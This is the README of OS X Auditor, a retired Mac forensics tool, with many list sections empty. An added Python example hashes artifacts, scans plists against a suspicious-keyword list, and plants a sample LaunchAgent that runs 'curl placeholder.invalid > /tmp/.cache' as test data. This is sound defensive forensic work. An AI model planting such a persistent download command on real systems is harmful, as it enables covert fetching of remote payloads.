OS X Auditor

Maintenance: No Maintenance Intended

OS X Auditor is a free Mac OS X computer forensics tool.

OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:

It extracts:

It also looks for suspicious keywords in the .plist themselves.

It can verify the reputation of each file on:

It can aggregate all logs from the following directories into a zipball:

Finally, the results can be:
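The three core steps the README lists above, hashing every artifact under a system root, parsing the .plist files and scanning their string values for suspicious keywords, and bundling log directories into a zipball, are shown here as an added example. This is not OS X Auditor's own code: the keyword list, the directory layout and the sample launch agent are constructed for the demo, the sample tree is built in a temporary directory so it runs offline on any OS, and plist parsing uses Python 3's standard plistlib (which reads both XML and binary plists) rather than the pyobjc path the tool describes.

```python
"""Added example (not OS X Auditor's code): hash artifacts, scan plists for
keywords and zip logs, driven against a constructed sample system tree."""
import hashlib
import os
import plistlib
import tempfile
import zipfile

# Assumed keyword list for the demo; the tool's real list is not on the page.
SUSPICIOUS_KEYWORDS = ("/tmp/", "curl", "base64", "nohup")


def sha256_file(path, chunk=1 << 20):
    """Stream the file so large artifacts never have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def hash_tree(root):
    """Map every regular file under root (path relative to root) to its SHA-256."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not os.path.islink(full):
                result[os.path.relpath(full, root)] = sha256_file(full)
    return result


def _string_values(node):
    """Yield every string leaf of a parsed plist (nested dicts and lists included)."""
    if isinstance(node, dict):
        for value in node.values():
            yield from _string_values(value)
    elif isinstance(node, list):
        for value in node:
            yield from _string_values(value)
    elif isinstance(node, str):
        yield node


def scan_plist(path, keywords=SUSPICIOUS_KEYWORDS):
    """Parse an XML or binary plist; return the keywords found in any string value."""
    with open(path, "rb") as fh:
        data = plistlib.load(fh)          # format is auto-detected
    hits = {kw for text in _string_values(data)
            for kw in keywords if kw.lower() in text.lower()}
    return sorted(hits)


def zip_logs(log_dirs, out_path):
    """Copy every file below each log directory into one zip; return member names."""
    members = []
    with zipfile.ZipFile(out_path, "w", zipfile.ZIP_DEFLATED) as zf:
        for log_dir in log_dirs:
            top = os.path.basename(os.path.normpath(log_dir))
            for dirpath, _dirs, files in os.walk(log_dir):
                for name in files:
                    full = os.path.join(dirpath, name)
                    arc = os.path.join(top, os.path.relpath(full, log_dir))
                    arc = arc.replace(os.sep, "/")
                    zf.write(full, arc)
                    members.append(arc)
    return members


def build_sample_system():
    """Constructed stand-in for a mounted copy of a system; returns its root."""
    root = tempfile.mkdtemp(prefix="osxa_")

    def put(rel, data):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)

    # A constructed user LaunchAgent whose command line trips two keywords.
    put("Users/alice/Library/LaunchAgents/com.example.updater.plist",
        plistlib.dumps({"Label": "com.example.updater",
                        "ProgramArguments": ["/bin/sh", "-c",
                                             "curl placeholder.invalid > /tmp/.cache"],
                        "RunAtLoad": True}, fmt=plistlib.FMT_BINARY))
    # A benign preferences plist, written as XML to exercise both formats.
    put("Users/alice/Library/Preferences/com.apple.finder.plist",
        plistlib.dumps({"ShowHardDrivesOnDesktop": True}))
    put("var/log/system.log", b"Jan  1 00:00:01 host kernel[0]: constructed sample line\n")
    put("var/log/wifi.log", b"")        # empty rotated log
    return root


def audit(root, zip_out=None):
    """Run the three steps over root and return a report dict."""
    hashes = hash_tree(root)              # hash before the zip is written
    plist_hits = {rel: scan_plist(os.path.join(root, rel))
                  for rel in hashes if rel.endswith(".plist")}
    zip_out = zip_out or os.path.join(root, "logs.zip")
    members = zip_logs([os.path.join(root, "var", "log")], zip_out)
    return {"hashes": hashes, "plist_hits": plist_hits, "log_members": members}


if __name__ == "__main__":
    report = audit(build_sample_system())
    for rel, digest in sorted(report["hashes"].items()):
        print(digest, rel)
    for rel, hits in report["plist_hits"].items():
        if hits:
            print("SUSPICIOUS", rel, hits)
    print("zipped:", report["log_members"])
```

Hashing runs before the zip is written so the report never hashes its own output, and the scan walks nested plist values (ProgramArguments arrays are where launch agents carry their command lines) instead of grepping the raw file, which would miss strings in binary plists.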

Author

Jean-Philippe Teissier - @Jipe_ et al.

Development status

OS X Auditor IS NO LONGER MAINTAINED - YOU SHOULD NOT USE IT

Support

OS X Auditor started as a weekend project and is no longer maintained. It has been forked by the great guys @ Yelp, who created osxcollector.

I recommend using osxcollector instead (https://github.com/Yelp/osxcollector).

How to install

Just copy all files from GitHub.

Dependencies

If you plan to run OS X Auditor on a Mac, you will get full plist parsing support through the OS X Foundation framework via pyobjc:

If you can't install pyobjc, or if you plan to run OS X Auditor on an OS other than Mac OS X, you may run into trouble with plist parsing:

These dependencies will be removed once a working native plist module is available in Python.

How to run

Type osxauditor.py -h to list all available options, then run it with the options you need.

e.g. [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html

Setting Environment Variables

VirusTotal API:

export VT_API_KEY=aaaabbbbccccddddeeee

Changelog

0.4.3

0.4.2

0.4.1

0.4

0.3.1

0.3

0.2.1

0.2

0.1

Design & Capabilities

Artifacts

Users

System

TODO

Related work

Disk Arbitrator

Disk Arbitrator is a Mac OS X forensic utility designed to help the user ensure correct forensic procedures are followed while imaging a disk device. Disk Arbitrator is essentially a user interface to the Disk Arbitration framework, which lets a program participate in the management of block storage devices, including the automatic mounting of file systems. When enabled, Disk Arbitrator blocks the mounting of file systems, so the evidence is never mounted read-write and its integrity is preserved.

https://github.com/aburgh/Disk-Arbitrator

Volafox

volafox, a.k.a. 'Mac OS X Memory Analysis Toolkit', is developed in Python 2.x.

https://code.google.com/p/volafox/

Mandiant Memoryze(tm) for the Mac

Memoryze for the Mac is free memory forensic software that helps incident responders find evil in memory… on Macs. Memoryze for the Mac can acquire and/or analyze memory images. Analysis can be performed on offline memory images or on live systems.

http://www.mandiant.com/resources/download/mac-memoryze

Volatility MacMemoryForensics

https://code.google.com/p/volatility/wiki/MacMemoryForensics

License

OS X Auditor Copyright (C) 2013-2015 Jean-Philippe Teissier

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.

Bootstrap and jQuery have their own GPL-compatible licences.